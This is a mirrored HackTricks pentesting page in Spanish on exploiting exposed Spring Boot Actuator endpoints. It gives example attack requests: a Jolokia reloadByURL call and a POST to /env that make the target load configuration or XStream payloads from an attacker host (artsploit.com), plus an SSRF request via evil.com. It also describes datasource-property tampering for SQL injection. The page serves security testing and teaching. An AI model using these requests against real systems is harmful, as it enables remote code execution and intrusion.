Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 05:03:35 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/spring-actuators.md

5.8 KiB
Raw Blame History

Spring Actuators

Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks:

Bypass de Autenticación de Spring

Desde https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png****

Explotando Spring Boot Actuators

Consulta la publicación original en [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]

Puntos Clave:

  • Los Actuators de Spring Boot registran endpoints como /health, /trace, /beans, /env, etc. En las versiones 1 a 1.4, estos endpoints son accesibles sin autenticación. A partir de la versión 1.5 en adelante, solo /health y /info no son sensibles por defecto, pero los desarrolladores a menudo deshabilitan esta seguridad.
  • Algunos endpoints de Actuator pueden exponer datos sensibles o permitir acciones dañinas:
  • /dump, /trace, /logfile, /shutdown, /mappings, /env, /actuator/env, /restart y /heapdump.
  • En Spring Boot 1.x, los actuators se registran bajo la URL raíz, mientras que en 2.x, se encuentran bajo la ruta base /actuator/.

Técnicas de Explotación:

  1. Ejecución Remota de Código a través de '/jolokia':
  • El endpoint del actuator /jolokia expone la Biblioteca Jolokia, que permite acceso HTTP a MBeans.
  • La acción reloadByURL puede ser explotada para recargar configuraciones de logging desde una URL externa, lo que puede llevar a XXE ciego o Ejecución Remota de Código a través de configuraciones XML manipuladas.
  • URL de exploit de ejemplo: http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
  1. Modificación de Configuración a través de '/env':
  • Si están presentes las bibliotecas de Spring Cloud, el endpoint /env permite la modificación de propiedades ambientales.
  • Las propiedades pueden ser manipuladas para explotar vulnerabilidades, como la vulnerabilidad de deserialización XStream en la serviceURL de Eureka.
  • Solicitud POST de exploit de ejemplo:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65

eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
  1. Otros Ajustes Útiles:
  • Propiedades como spring.datasource.tomcat.validationQuery, spring.datasource.tomcat.url y spring.datasource.tomcat.max-active pueden ser manipuladas para varios exploits, como inyección SQL o alteración de cadenas de conexión de base de datos.

Información Adicional:

  • Se puede encontrar una lista completa de actuators por defecto aquí.
  • El endpoint /env en Spring Boot 2.x utiliza formato JSON para la modificación de propiedades, pero el concepto general sigue siendo el mismo.

Temas Relacionados:

  1. RCE de Env + H2:
  • Detalles sobre cómo explotar la combinación del endpoint /env y la base de datos H2 se pueden encontrar aquí.
  1. SSRF en Spring Boot a través de la Interpretación Incorrecta de Nombres de Ruta:
  • El manejo de parámetros de matriz (;) en nombres de ruta HTTP del framework Spring puede ser explotado para Falsificación de Petición del Lado del Servidor (SSRF).
  • Solicitud de exploit de ejemplo:
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de AWS de HackTricks)!

Otras formas de apoyar a HackTricks: